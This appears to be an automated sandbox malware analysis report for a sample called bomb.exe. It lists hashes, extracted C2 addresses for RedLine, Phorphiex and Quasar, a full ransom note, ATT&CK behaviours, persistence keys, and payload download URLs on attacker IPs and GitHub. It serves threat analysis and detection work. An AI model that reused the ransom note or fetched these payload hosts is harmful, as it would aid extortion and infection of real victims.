asyncrat | 94936fb4c7bed2e7233fade7980425b0300451d76a7ac9329c604886e2a9a013

Resubmissions

22/02/2025, 17:20

250222-vwwqmavlhl 10

22/02/2025, 16:34

250222-t3a7tstphq 10

Analysis

max time kernel
22s
max time network
541s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22/02/2025, 16:34

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

bomb.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Malware Config

Extracted

Family

redline

Botnet

Feb2025

176.65.144.135:65012

Extracted

Family

phorphiex

http://91.202.233.141

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note

ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :EB236E57961CAF96BF279A60AE9DAF2482541C2B2DFCB1579FF558522C3C285FE48609B7B3F98EB7178076F9F45E7A3872D3C876F8F7C1A8C169991146146661BE5CA3DD256C3A45986B5F4BB90A8B24A91F1FD3315EAD308F25A15B36D875F6CCEE4BE464DB5FD24D2382AAAAA562D39AC591C56D5D374D5333F1CBA0699A61F9436AB5115758D73186F6BEB755B96F7110971B4812321BE5C99C008F1D43EAC5767483B196B479C49AABD7D8964EB01386FB2EE744B0010C68CB29A8D902FB74490FADDCBA1B66D8AE8267940BF4F7F101824EF8EE8118CD610CA436D79621A45ECB6507CE9D867A58C19E8C73CBED2A7770D2D6F0A293E52E5B453950BB69039ADFA89F5A95AF99F610EC7DBC596F203601C5FE7DF2F8356A841D6E5158C6D4143B4F8A186302265480BBDB65A7D5E6CA7508C0A708F4EE7BC82710BDF61F779BA7D56716FC228FDB4B439F359AAB7ECEC0D288BEE158818D1961DC282A0FF73E0FAAC90A40B9179B3FF41F8F03A76B3248EB537DADBB778EE625C26161DFB7D9CB3743EEF3AA4B13C7CE064DB5BCF43C2A1DB79C65E8ACDE3B64436D2D67F825782239650C70700B20B8A70DAD282FBEFCC2C7DE9E0FF7A992534892E24D8D4623BD78C6C19C203F82C69BA0966AF8E7D58E1583014296DBE4C9C11DC80DBC506184467D015DF4E0E2EC640D009A7BEF35F1F222469B2D2E538C885C34A1B55C4DDE395B2EDA688EA198D2B2D6B2EDCCBE0058A78B7674AD936B192F37931EA1C4DE7769C4F24674D70B85EAC2952DE251EFCF8D434A36A6C73832C096B19005F4CC3D6B49EB46313056EC03A639EE41A9AEC30F745BCDFECD9A99F9420FF01E02052496279D2478079D3B7B0D22A0E5CE1DBF0AF0A16BE1B3079F4A5BF6808EAD0A8320080227D1C64DA30E0A18EAF10CB811843614A92ADC0F1D45CFC9F20042B4051EF8B44E8703D6814075ED4DC849208E067044E897C9341A870BDE3DFF5C53927D887447603CC21263E80C76E155AC44346C84838084BE7A9A9EC2AFD698DB3AF0674F5C936B86769CC67FC58997FE07637CE4991A5DA75F16E20C29D80B8E0B60E7C9C73777C260E1BE69FBB6C68D5C4FC9AA2C3E49254098253FF3D3FEA2893CA144D969EE2BD1B62B532F90D222A8D34A3178546ED41F7FE0ABF1B87CD718572AFFCDC16B33371B775D3A724413F977FB3E2F282E7270E6A0CB4A4C5A066146B8FE30509B7C75C986852F3195BCA1E0059A75E7503D9BFE9F7C96312DEC45C25D3CE4F63ECCB9839ABAD73EE51DB35C26AB6F01DFA379E249A1DAEC96B7FCD6FFF59881BEB7E1C1853ED5200B533BE2018DD7C1ADC80C507CFD2BB24C615F08835E49A5BBD0FBCF289EB6EB8ACC8A1FF34FDCA2BD565358218B370D74CCBD817B250AED6885651E92A5589A7900CA118E3EBB1685F7D7E9DBF391826A8CE40419EBEC82DDE488BA55E113AA0E83A88CB8231CF52ACE7ABB79780163CC3C25795278E28988DA36003F06605550E44A64E3CC08E39E6BCD7CE5558356DAC080479A765BE0A02CCF7895DE4F0E42647FC2635787E9C49E74AC7B96CADE2998F07EE2554A9B57BF84C733E16A8856ACD11833F43AA980B2CC2B4D477B06249EE2BB20869D6BCDD9B3D3698B763E0F276818895DC9DA986D8A15C4432290CB21E5CDA9286E9E9187B1AEC1703976D16927A03C3ADFFF8EFE9924ABE460FE34D7D43A61131532868D62F373DE530E2F2218A061D0D9FCBFE622D7DBBA350ABCF9F9B8D8870AB2183BB2854A73DCE2F1142937FC5205CABFF27333935D61248CA5387AF4DC339FB8580A6495762E30BF453D2A4301FBB915FB5F0B73CFAB416C0C42C032067E6CCA38594ECF5DD8801A3B8A6992DA9F22BA5B15503ECF60EEC22AACF2EE89DECF47AA2BE81C05CB9ED5806CD1FF7F91B80CCF9155F13065757378C1021065BE003CBB6A84CFFA73246BDBC2E18EBF9F71FDD6455CC4E77F7BC72CBE4189A4DA662417B1D55F62CE7273F65B2DECF29D320398B7E6E14B3CB1337666FFEEA0B9D1FE1A0007CF8A4289BBD4A5CB72ABEAB0627B11E763664C084CF68E077CD952F2758191344AFF54FB912B7065F03E191C3F7A812643D483838BEB95303D8427DC62463656B3C836A428ACC3CC87954B01D1FA6D2AE514C41C1703E40C2C81EDE1F46E076BAAB5B4466AE30921A789B6C74179E352BD20A06180234F7C1F904156048F44971F4118E697F9773CC3445716A701208605306E87999EFFDEEFFFFB7329AA1546514370182DA37B6CBCD0BA63DBAB0797D881E4D904C6A85460AB4056FFE5F96C1A47729E49D7513306D1AC70736500AB56E9DB210646F6499B7265326D

Emails

[email protected]

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

162.230.48.189:9050

Mutex

e1371af2-3c26-486c-a950-9db9a0954e65

Attributes

encryption_key
B29AF710516F59F4E03DA48D133686BA3D427275
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Startup
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Phorphiex family
phorphiex

Phorphiex payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000c000000027d76-30.dat	family_phorphiex
behavioral3/memory/2452-37-0x0000000000DC0000-0x0000000000DD0000-memory.dmp	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral3/memory/6960-4779-0x0000000000780000-0x0000000000AA4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000a000000027dce-1483.dat	family_redline
behavioral3/memory/5532-2955-0x0000000000710000-0x000000000072E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000a000000027dce-1483.dat	family_sectoprat
behavioral3/memory/5532-2955-0x0000000000710000-0x000000000072E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000a000000027dcb-1699.dat	family_stormkitty
behavioral3/memory/6504-1781-0x0000017C9CF80000-0x0000017C9D284000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral3/memory/2524-239-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-238-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-236-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-234-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-252-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-235-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-219-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/memory/2524-218-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral3/files/0x000a000000027db1-983.dat	family_xmrig
behavioral3/files/0x000a000000027db1-983.dat	xmrig
behavioral3/files/0x0007000000027f7f-7684.dat	family_xmrig
behavioral3/files/0x0007000000027f7f-7684.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/files/0x000a000000027dcb-1699.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral3/files/0x000a000000027dae-226.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4576	powershell.exe
5884	powershell.exe
1376	powershell.exe
1284	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 13 IoCs

flow	pid	Process
6	1432	bomb.exe
6	1432	bomb.exe
19	4412	http185.215.113.66pei.exe.exe
8	1432	bomb.exe
8	1432	bomb.exe
9	1432	bomb.exe
9	1432	bomb.exe
9	1432	bomb.exe
9	1432	bomb.exe
9	1432	bomb.exe
17	1432	bomb.exe
16	1432	bomb.exe
10	1432	bomb.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
6296	cmd.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2576	netsh.exe
2016	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 2 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
6236	msedge.exe
7764	chrome.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	bomb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	http185.215.113.66minedelll.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	http185.215.113.66del1.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation	http185.215.113.66mindelnew.exe.exe

Executes dropped EXE 17 IoCs

pid	Process
2452	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
4412	http185.215.113.66pei.exe.exe
3512	httptwizt.netnewtpp.exe.exe
1248	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
3480	http185.215.113.75filesLisan7random.exe.exe
2212	245371002.exe
4140	sysnldcvmr.exe
2924	sysnldcvmr.exe
2448	WindowsServices.exe
3388	svchost.exe
1104	http185.215.113.75filesz1nk0vrandom.exe.exe
3168	http185.215.113.66mindelnew.exe.exe
752	http185.215.113.66xmin.exe.exe
4108	http185.215.113.66del3.exe.exe
2180	http185.215.113.66minedelll.exe.exe
4988	http185.215.113.66del1.exe.exe
1536	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	245371002.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
1708	cmd.exe
3180	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 23 IoCs

Web Service

T1102

flow	ioc
265	bitbucket.org
287	pastebin.com
298	discord.com
329	discord.com
486	bitbucket.org
237	raw.githubusercontent.com
288	pastebin.com
297	discord.com
342	discord.com
9	raw.githubusercontent.com
56	bitbucket.org
263	bitbucket.org
269	pastebin.com
277	pastebin.com
286	pastebin.com
348	discord.com
488	bitbucket.org
5	raw.githubusercontent.com
8	raw.githubusercontent.com
290	pastebin.com
321	raw.githubusercontent.com
59	bitbucket.org
238	raw.githubusercontent.com

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5536	cmd.exe
7088	powercfg.exe
5180	powercfg.exe
4652	powercfg.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
6448	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
6868	cmd.exe

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/2524-215-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-213-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-212-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-239-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-238-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-236-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-234-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-252-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-235-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-219-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-218-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-216-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/2524-214-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral3/memory/6052-7692-0x00007FF964F80000-0x00007FF965568000-memory.dmp	upx
behavioral3/memory/6052-7716-0x00007FF9818F0000-0x00007FF9818FF000-memory.dmp	upx
behavioral3/memory/6052-7715-0x00007FF981900000-0x00007FF981924000-memory.dmp	upx
behavioral3/memory/6052-7727-0x00007FF964A80000-0x00007FF964DF5000-memory.dmp	upx
behavioral3/memory/6052-7728-0x00007FF97BF50000-0x00007FF97C008000-memory.dmp	upx
behavioral3/memory/6052-7724-0x00007FF97F070000-0x00007FF97F093000-memory.dmp	upx
behavioral3/memory/6052-7723-0x00007FF97F0A0000-0x00007FF97F0CD000-memory.dmp	upx
behavioral3/memory/6052-7745-0x00007FF97EF90000-0x00007FF97EFA4000-memory.dmp	upx
behavioral3/memory/6052-7734-0x00007FF97EFB0000-0x00007FF97EFC2000-memory.dmp	upx
behavioral3/memory/6052-7733-0x00007FF97F020000-0x00007FF97F035000-memory.dmp	upx
behavioral3/memory/6052-7726-0x00007FF97F040000-0x00007FF97F06E000-memory.dmp	upx
behavioral3/memory/6052-7725-0x00007FF964E00000-0x00007FF964F73000-memory.dmp	upx
behavioral3/memory/6052-7722-0x00007FF97F0D0000-0x00007FF97F0E9000-memory.dmp	upx
behavioral3/memory/6052-7721-0x00007FF9818E0000-0x00007FF9818ED000-memory.dmp	upx
behavioral3/memory/6052-7720-0x00007FF980990000-0x00007FF9809A9000-memory.dmp	upx
behavioral3/files/0x000d000000027feb-8807.dat	upx

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\sysnldcvmr.exe	245371002.exe
File created	C:\Windows\svchost.exe	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
File created	C:\Windows\WindowsServices.exe	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
560	sc.exe
4888	sc.exe
6352	sc.exe
6840	sc.exe
7112	sc.exe
1560	sc.exe
788	sc.exe
2132	sc.exe
6332	sc.exe
696	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral3/files/0x000a000000027dd4-3776.dat	pyinstaller
behavioral3/files/0x0008000000027ef3-7052.dat	pyinstaller
behavioral3/files/0x0007000000027f76-7517.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5060	3480	WerFault.exe	84
4772	4460	WerFault.exe	387

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesLisan7random.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	245371002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesz1nk0vrandom.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66mindelnew.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
692	cmd.exe
7020	PING.EXE

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral3/files/0x000c000000027e2d-7942.dat	nsis_installer_1
behavioral3/files/0x000c000000027e2d-7942.dat	nsis_installer_2

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3644	WMIC.exe

Kills process with taskkill 12 IoCs

defense_evasion

pid	Process
5772	taskkill.exe
1304	taskkill.exe
1176	taskkill.exe
1400	taskkill.exe
6068	taskkill.exe
4404	taskkill.exe
2436	taskkill.exe
7760	taskkill.exe
2276	taskkill.exe
4948	taskkill.exe
740	taskkill.exe
1816	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
6248	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
7020	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4680	schtasks.exe
2628	schtasks.exe
8116	schtasks.exe
6316	schtasks.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2180	http185.215.113.66minedelll.exe.exe
4988	http185.215.113.66del1.exe.exe
752	http185.215.113.66xmin.exe.exe
4280	conhost.exe
752	http185.215.113.66xmin.exe.exe
1104	http185.215.113.75filesz1nk0vrandom.exe.exe
1104	http185.215.113.75filesz1nk0vrandom.exe.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	bomb.exe
Token: SeDebugPrivilege	2180	http185.215.113.66minedelll.exe.exe
Token: SeDebugPrivilege	4988	http185.215.113.66del1.exe.exe
Token: SeDebugPrivilege	4280	conhost.exe
Token: SeDebugPrivilege	1104	http185.215.113.75filesz1nk0vrandom.exe.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1432 wrote to memory of 2452	1432	bomb.exe	81
PID 1432 wrote to memory of 2452	1432	bomb.exe	81
PID 1432 wrote to memory of 2452	1432	bomb.exe	81
PID 1432 wrote to memory of 4412	1432	bomb.exe	80
PID 1432 wrote to memory of 4412	1432	bomb.exe	80
PID 1432 wrote to memory of 4412	1432	bomb.exe	80
PID 1432 wrote to memory of 3512	1432	bomb.exe	82
PID 1432 wrote to memory of 3512	1432	bomb.exe	82
PID 1432 wrote to memory of 3512	1432	bomb.exe	82
PID 1432 wrote to memory of 1248	1432	bomb.exe	83
PID 1432 wrote to memory of 1248	1432	bomb.exe	83
PID 1432 wrote to memory of 1248	1432	bomb.exe	83
PID 1432 wrote to memory of 3480	1432	bomb.exe	84
PID 1432 wrote to memory of 3480	1432	bomb.exe	84
PID 1432 wrote to memory of 3480	1432	bomb.exe	84
PID 4412 wrote to memory of 2212	4412	http185.215.113.66pei.exe.exe	89
PID 4412 wrote to memory of 2212	4412	http185.215.113.66pei.exe.exe	89
PID 4412 wrote to memory of 2212	4412	http185.215.113.66pei.exe.exe	89
PID 3512 wrote to memory of 4140	3512	httptwizt.netnewtpp.exe.exe	90
PID 3512 wrote to memory of 4140	3512	httptwizt.netnewtpp.exe.exe	90
PID 3512 wrote to memory of 4140	3512	httptwizt.netnewtpp.exe.exe	90
PID 2212 wrote to memory of 2924	2212	245371002.exe	91
PID 2212 wrote to memory of 2924	2212	245371002.exe	91
PID 2212 wrote to memory of 2924	2212	245371002.exe	91
PID 1248 wrote to memory of 2448	1248	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	92
PID 1248 wrote to memory of 2448	1248	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	92
PID 1248 wrote to memory of 2448	1248	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe	92
PID 2452 wrote to memory of 3388	2452	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	93
PID 2452 wrote to memory of 3388	2452	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	93
PID 2452 wrote to memory of 3388	2452	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe	93
PID 1432 wrote to memory of 1104	1432	bomb.exe	94
PID 1432 wrote to memory of 1104	1432	bomb.exe	94
PID 1432 wrote to memory of 1104	1432	bomb.exe	94
PID 1432 wrote to memory of 3168	1432	bomb.exe	191
PID 1432 wrote to memory of 3168	1432	bomb.exe	191
PID 1432 wrote to memory of 3168	1432	bomb.exe	191
PID 1432 wrote to memory of 752	1432	bomb.exe	96
PID 1432 wrote to memory of 752	1432	bomb.exe	96
PID 1432 wrote to memory of 4108	1432	bomb.exe	97
PID 1432 wrote to memory of 4108	1432	bomb.exe	97
PID 1432 wrote to memory of 2180	1432	bomb.exe	235
PID 1432 wrote to memory of 2180	1432	bomb.exe	235
PID 1432 wrote to memory of 4988	1432	bomb.exe	99
PID 1432 wrote to memory of 4988	1432	bomb.exe	99
PID 2180 wrote to memory of 5008	2180	http185.215.113.66minedelll.exe.exe	174
PID 2180 wrote to memory of 5008	2180	http185.215.113.66minedelll.exe.exe	174
PID 4988 wrote to memory of 4820	4988	http185.215.113.66del1.exe.exe	102
PID 4988 wrote to memory of 4820	4988	http185.215.113.66del1.exe.exe	102
PID 5008 wrote to memory of 788	5008	cmd.exe	104
PID 5008 wrote to memory of 788	5008	cmd.exe	104
PID 4820 wrote to memory of 1560	4820	cmd.exe	159
PID 4820 wrote to memory of 1560	4820	cmd.exe	159
PID 5008 wrote to memory of 1824	5008	cmd.exe	299
PID 5008 wrote to memory of 1824	5008	cmd.exe	299
PID 4820 wrote to memory of 2696	4820	cmd.exe	107
PID 4820 wrote to memory of 2696	4820	cmd.exe	107
PID 3168 wrote to memory of 3180	3168	http185.215.113.66mindelnew.exe.exe	110
PID 3168 wrote to memory of 3180	3168	http185.215.113.66mindelnew.exe.exe	110
PID 3168 wrote to memory of 3180	3168	http185.215.113.66mindelnew.exe.exe	110
PID 4108 wrote to memory of 4280	4108	http185.215.113.66del3.exe.exe	112
PID 4108 wrote to memory of 4280	4108	http185.215.113.66del3.exe.exe	112
PID 4108 wrote to memory of 4280	4108	http185.215.113.66del3.exe.exe	112
PID 3168 wrote to memory of 4520	3168	http185.215.113.66mindelnew.exe.exe	113
PID 3168 wrote to memory of 4520	3168	http185.215.113.66mindelnew.exe.exe	113

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7844	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bomb.exe
"C:\Users\Admin\AppData\Local\Temp\bomb.exe"
1⤵
- Downloads MZ/PE file
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Users\Admin\AppData\Local\Temp\245371002.exe
    C:\Users\Admin\AppData\Local\Temp\245371002.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\sysnldcvmr.exe
